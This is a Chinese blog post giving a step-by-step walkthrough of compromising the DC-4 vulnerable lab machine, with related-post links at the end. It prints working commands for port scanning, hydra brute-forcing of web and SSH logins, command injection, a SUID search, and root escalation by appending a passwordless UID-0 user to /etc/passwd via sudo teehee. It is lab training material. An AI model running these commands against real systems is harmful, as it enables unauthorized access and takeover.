DC4靶机训练

最新推荐文章于 2024-07-23 16:25:29 发布
最新推荐文章于 2024-07-23 16:25:29 发布
阅读量187 收藏 1
点赞数
分类专栏: 内网安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51353029/article/details/119968989
版权

kali🐓:192.168.78.131
靶机:192.168.68.137

信息搜集

查询内网机器网段并扫描存活主机

ifconfig
nmap -sP 192.168.78.0/24

在这里插入图片描述
扫描存活主机开放端口:

nmap -p 1-65535 -A -sV 192.168.78.133

在这里插入图片描述
发现开放了80端口和SSH端口,后续应该会用到远程登陆

访问80端口,上来就是一个登录窗口,不出意外大概率是工具破解
还是先扫一下目录
在这里插入图片描述

没有什么发现
那就直接爆破账户和密码
推荐使用kali自带的字典

hydra -l admin -P rockyou.txt 192.168.25.134 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

在这里插入图片描述

这里可以直接爆破出账户和密码
当然也可以使用brup去爆破,爆破途径都差不多,主要是字典

在这里插入图片描述

爆破拿到账户:admin 密码:happy
拿到这个第一反应就是登录SHH

在这里插入图片描述
密码不正确,不着急,先去登录界面看看有什么

在这里插入图片描述
发现一个意思命令执行的地方

修改参数确认是否是命令执行

在这里插入图片描述

确认是一个小shell了,接下来应该去查找一些密码信息,保证我们能够ssh登录成功
先检查etc/passwd的权限
在这里插入图片描述

以及/etc/shadow的权限
在这里插入图片描述

看来通过查询密码或者添加用户的方法不可行
进入/HOME目录看看有没有什么发现

在这里插入图片描述

最终在/home/jim/backups目录下发现一个似乎存着密码的bak文件

在这里插入图片描述

最终拿到一份储存着账户jim的密码的字典
接下来爆破SSH登录

hydra -l jim -P jim.txt 192.168.78.137 ssh -s 22

在这里插入图片描述

拿下密码,登录SSH

ssh jim@192.168.78.137 -p 22

在这里插入图片描述

查看一下SUID

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现有个脚本并且我们有增删查改以及可执行权限,那么我们可以在该脚本中回连shell

shell确实是连接上了,但是权限依然是低权
在这里插入图片描述

为什么是低权,我们查看一下文件所属者(拥有者)即可
在这里插入图片描述

很显然一目了然 是jim,suid本来执行就是以拥有者的身份执行,所以这里连上shell后是Jim也就不奇怪了

重新连接JIM 有了新的发现:
在这里插入图片描述
终于给了提示,我们的邮箱,于是在/var/mail中找到charles账户以及密码^xHhA&hvim0y

切换到charles用户,并查看免密的命令,发现teehee
在这里插入图片描述

实现teesh提权
teehee: 把输入写入文件中,至于怎么是追加还是覆盖看自己
那这里就可以直接写一个Root账户到passwd里面去

#如:admin:x:0:0::/home/admin:/bin/bash
#[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd(这里就添加了一个无密码登录的test用户 root权限)

在这里插入图片描述

最终在root目录下拿到flag

在这里插入图片描述
work done!

hahahahaha!
关注
专栏目录
【vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1970
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
靶机DC-2(新手训练
kyp_1994的博客
09-06 1006
dc-2靶机渗透靶机渗透,新手
DC4靶机
qq_40646572的博客
04-29 324
靶机信息搜集 发现DC4靶机是192.168.220.208,DC4靶机开启端口是22,80端口。 防止端口信息遗漏,扫描全部端口,nmap默认扫描端口0-1000。 端口扫描完成后,使用nmap脚本漏洞扫描。发现没有可以利用的漏洞。 尝试对靶机进行攻击 打开80端口的http服务,查看目标主机网站是否存在可以打穿到后台的漏洞。 首先进行目录扫描。 未搜集到任何可以利用的信息。。。 下面有两种思路,一种尝试sql注入,另一种,爆破http登录或者ssh爆破。 先尝试sql注入,失败。。。。 下.
DC-4靶机通关
最新发布
qq_63831588的博客
07-23 1084
teehee提权,bp爆破
DC4靶机
小小猪的博客
06-10 447
DC4靶机 实验环境 靶机:kali 目标机:DC-4 实验工具:burpsuite 实验步骤 arp-scan -l扫描主机ip地址 nmap扫描开的端口 进行访问80,需要输入密码 hydra -l admin -P /usr/share/wordlists/rockyou.txt x.x.x.161 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F 进行密码爆破 这里注
DC-4靶机
mlws1900的博客
03-24 1188
下载不下来用迅雷下载。
39772.zip靶机所用文件66
08-11
【标签】"dc3靶机所用文件"进一步确认了这个压缩包的内容与DC3靶机训练有关,文件可能是为了设置、维护或挑战靶机环境而设计的。这些文件可能包括配置脚本、漏洞利用代码、安全工具、日志文件、证书、数据库文件以及...
DC系列漏洞靶场-渗透测试学习复现(DC-7)
W983079520的博客
12-10 1828
DC-7是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权和shell二次反弹。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-7靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默
Lampiao 靶机练习
SYJ_361的博客
02-28 4741
利用kali对靶机进行扫描,远程登录靶机,并对靶机进行提权,找到靶机里面的文件
DC-1靶场搭建及渗透
weixin_55772865的博客
06-13 603
回到/var/www目录下,执行加密脚本 cd ../ php scripts/password-hash.sh 666。1.回到该靶场的根目录下,在scripts目录下存在hash密码加密脚本password-hash.sh。4.扫描192.168.75.129发现就是我们要找的dc-1,且开放80端口,尝试访问一下。首先查找有suid权限的文件,发现find命令有suid权限,那就利用find命令进项提权。4.更新后用户名:admin 密码:666,去开放的80端口网页访问。
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
靶机DC-4
weixin_43940853的博客
11-21 437
kali : 192.168.230.226 靶机 :192.168.230.229 开放了web和ssh,还是从web入手 有个登陆页面,这里试了几个弱口令,不能登,看Wp说是爆破一下密码是happy,这里就跳过了(真实情况下哪有这么容易就登陆,主要是积累一下提权方式吧) 发现有可以执行命令的地方,这就想到了反弹一个shell,前面有一个Acid靶机也是这样做的,不过这个靶机是用的netc...
渗透测试学习之靶机DC-4
情感博主V
03-11 320
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.141 2. 信息搜集 端口信息 web站点的相关服务信息 登录页面: 目录信息 使用dirbuster: login.php和logout.php也会跳转到index.php这个登录页面。 ...
靶机DC-4—WP
m0_66638011的博客
06-22 1044
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-4靶场攻破过程:1.首先我们进行主机发现,将测试机的网站进行了指纹扫描,发现它没有任何框架。2.然后我们进行bp抓包,发现了暴力破解漏洞。
DC系列(4)DC-4靶机渗透
Nikris的博客
01-11 953
DC-4
DC-4靶机渗透
m0_62008601的博客
05-11 452
攻击机kali:192.168.56.102 靶机dc-4:192.168.56.105 扫描存活主机ip:arp-scan -l 接着扫描端口:nmap -sV -p- 192.168.56.105 发现开放80端口和22端口 ,存在http服务,用浏览器进行访问 可以看到是个登录页面且为admin信息系统登录,那用户名就是admin了,抓包对密码进行爆破 字典的话选自带的password.lst就行,路径/usr/share/john/password.lst 社区版bp调
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值